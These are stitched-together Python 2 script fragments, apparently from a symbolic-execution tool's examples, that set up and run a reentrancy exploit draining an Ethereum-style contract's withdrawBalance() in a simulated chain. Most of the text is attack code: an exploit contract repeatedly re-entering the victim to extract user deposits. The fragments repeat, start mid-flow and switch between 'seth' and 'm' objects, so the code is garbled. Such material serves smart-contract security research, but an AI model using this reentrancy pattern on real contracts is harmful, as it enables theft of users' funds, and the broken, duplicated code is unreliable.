exploit_account = seth.solidity_create_contract(exploit_source_code, owner=attacker_account)
print "[+] Setup the exploit"
exploit_account.set_vulnerable_contract(contract_account)
exploit_account.set_reentry_reps(30)
print "\t Setting attack string"
#'\x9d\x15\xfd\x17'+pack_msb(32)+pack_msb(4)+'\x5f\xd8\xc7\x10',
reentry_string = ABI.make_function_id('withdrawBalance()')
exploit_account.set_reentry_attack_string(reentry_string)
print "[+] Initial world state"
print " attacker_account %x balance: %d"% (attacker_account, seth.get_balance(attacker_account))
print " exploit_account %x balance: %d"% (exploit_account, seth.get_balance(exploit_account))
print " user_account %x balance: %d"% (user_account, seth.get_balance(user_account))
print " contract_account %x balance: %d"% (contract_account, seth.get_balance(contract_account))
#User deposits all in contract
print "[+] user deposited some."
contract_account.addToBalance(value=100000000000000000)
print "[+] Let attacker deposit some small amount using exploit"
exploit_account.proxycall(ABI.make_function_id('addToBalance()'), value=100000000000000000)
print "[+] Let attacker extract all using exploit"
exploit_account.proxycall(ABI.make_function_id('withdrawBalance()'))
#Initialize user and contracts
user_account = seth.create_account(balance=100000000000000000)
attacker_account = seth.create_account(balance=100000000000000000)
contract_account = seth.solidity_create_contract(
contract_source_code, owner=user_account) #Not payable
exploit_account = seth.solidity_create_contract(exploit_source_code,
owner=attacker_account)
#User deposits all in contract
print "[+] user deposited some."
contract_account.addToBalance(value=100000000000000000)
print "[+] Initial world state"
print " attacker_account %x balance: %d" % (
attacker_account, seth.get_balance(attacker_account))
print " exploit_account %x balance: %d" % (
exploit_account, seth.get_balance(exploit_account))
print " user_account %x balance: %d" % (user_account,
seth.get_balance(user_account))
print " contract_account %x balance: %d" % (
contract_account, seth.get_balance(contract_account))
print "[+] Setup the exploit"
exploit_account.set_vulnerable_contract(contract_account)
print "\t Setting 30 reply reps"
exploit_account.set_reentry_reps(30)
print "\t Setting reply string"
exploit_account.set_reentry_attack_string(seth.SByte(4))
exploit_account = m.solidity_create_contract(exploit_source_code,
owner=attacker_account)
print "[+] Setup the exploit"
exploit_account.set_vulnerable_contract(contract_account)
exploit_account.set_reentry_reps(30)
print "[+] Setting attack string"
#'\x9d\x15\xfd\x17'+pack_msb(32)+pack_msb(4)+'\x5f\xd8\xc7\x10',
reentry_string = ABI.make_function_id('withdrawBalance()')
exploit_account.set_reentry_attack_string(reentry_string)
print "[+] Initial world state"
print " attacker_account %x balance: %d" % (attacker_account,
m.get_balance(attacker_account))
print " exploit_account %x balance: %d" % (exploit_account,
m.get_balance(exploit_account))
print " user_account %x balance: %d" % (user_account,
m.get_balance(user_account))
print " contract_account %x balance: %d" % (contract_account,
m.get_balance(contract_account))
#User deposits all in contract
print "[+] user deposited some."
contract_account.addToBalance(value=100000000000000000)
print "[+] Let attacker deposit some small amount using exploit"
exploit_account.proxycall(ABI.make_function_id('addToBalance()'),
value=100000000000000000)